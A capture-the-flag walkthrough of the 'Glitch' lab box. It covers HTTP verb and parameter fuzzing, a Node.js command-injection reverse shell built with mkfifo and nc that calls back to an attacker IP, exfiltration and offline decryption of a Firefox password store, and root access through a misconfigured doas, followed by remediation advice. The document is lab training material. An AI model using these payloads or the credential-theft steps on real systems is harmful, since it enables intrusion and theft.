Target IP: glitch.thm (Requires /etc/hosts entry)
Difficulty: Easy/Medium
Objective: User (user.txt) & Root (root.txt) Flags
1. Executive Summary
“Glitch” is a Node.js-based web server. Initial access requires a multi-step enumeration process involving API fuzzing and HTTP Verb Tampering. Access is gained by injecting a command into a vulnerable API endpoint to execute a reverse shell. Lateral movement leverages credentials recovered from a Firefox profile (firefox_decrypt). Privilege escalation is achieved by exploiting Doas, a lightweight alternative to Sudo, which was misconfigured to allow the user to run commands as root.
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Fuzzing API parameters and HTTP methods.
- T1059.007 (JavaScript): Exploiting Node.js Command Injection.
- T1555 (Credentials from Password Stores): Decrypting Firefox saved passwords.
- T1548 (Abuse Elevation Control Mechanism): Exploiting
doasconfiguration.
2. Operational Setup
Host Configuration
echo "10.10.x.x glitch.thm" | sudo tee -a /etc/hosts3. Enumeration: “The API Hunt”
A. Network Scanning
Nmap reveals only one port:
- 80/tcp (HTTP): Node.js Express server (likely).
B. Web Enumeration
- Access Token: Viewing the source code or a javascript file (often
script.jsor similar) reveals a logic where a cookie namedtokenis required.
- Action: Set cookie
token=value(often found in local storage or source). - Result: Access to the main dashboard.
- API Discovery:
The dashboard makes calls to
/api/items.
- GET
/api/items: Returns a list of items. - Hint: “Use other HTTP verbs.”
C. HTTP Verb Tampering
We fuzz the HTTP methods on /api/items.
curl -X POST http://glitch.thm/api/items
curl -X OPTIONS http://glitch.thm/api/items- Finding: The
POSTmethod is valid but requires a specific parameter.
D. Parameter Fuzzing
We fuzz the parameters for the POST request.
ffuf -u http://glitch.thm/api/items -X POST -d "FUZZ=test" -w /usr/share/wordlists/dirb/common.txt- Result:
cmd(orcommand).
4. Initial Access: Node.js RCE
The Vulnerability
The /api/items endpoint takes the cmd parameter and likely passes it to eval() or child_process.exec() on the backend. This is Server-Side Javascript Injection (SSJI) or simply Command Injection.
The Payload
You noted that standard Node.js reverse shells failed, but mkfifo worked. This suggests the server might be filtering specific characters or running in a limited environment, but standard shell commands are passed through.
Payload (URL Encoded):
# POST Body:
cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.YOUR.IP 4444 >/tmp/fExecution:
curl -X POST http://glitch.thm/api/items -d "cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.YOUR.IP 4444 >/tmp/f"Status: Shell as user.
5. Lateral Movement: Firefox Forensics
Enumeration
linpeas.sh failed (likely due to Node environment restrictions or missing tools like curl/wget on the box).
Manual enumeration revealed a hidden folder: ~/.firefox.
The Vulnerability
Firefox stores saved passwords in logins.json and key4.db (encryption key). If we have these files, we can decrypt the passwords offline.
Exploitation
- Exfiltration:
Zip or tar the
.firefoxfolder and download it to your attacker machine.
# On target
tar -czf firefox.tar.gz .firefox
# On attacker (using nc or python server to catch it)- Decryption: Tool: firefox_decrypt
python3 firefox_decrypt.py /path/to/downloaded/firefox/profile- Result:
- User:
v0id - Password:
[REDACTED](Recovered from Firefox).
Access:
su v0id
# Password: ...6. Privilege Escalation: Doas
Enumeration
Checking for standard sudo privileges (sudo -l) might show nothing or command not found.
However, checking for doas:
find / -name doas 2>/dev/null
# or check config
cat /etc/doas.conf- Config:
permit v0id as root(or similar).
What is Doas?
doas is the OpenBSD alternative to sudo. It is much simpler but achieves the same goal: executing commands as another user.
Exploitation
Since the config permits v0id to run commands as root:
doas /bin/bashNote: You might need to enter v0id’s password.
Result:
# whoami
rootRoot Flag: /root/root.txt.
7. Remediation (Blue Team)
- API Security:
- Restrict HTTP verbs (methods) that are not required. If the API only reads data, disable
POST. - Input Validation: Never pass user input (
cmd) directly toexec()oreval(). Use sanitized inputs or specific API functions.
- Endpoint Security:
- Firefox Profiles: Users should not store corporate or system credentials in browser password managers on servers. Use a dedicated Secrets Management solution.
- Doas/Sudo:
- Restrict
doasorsudoto specific commands/scripts rather than allowing a full shell (/bin/bash) or generic root access.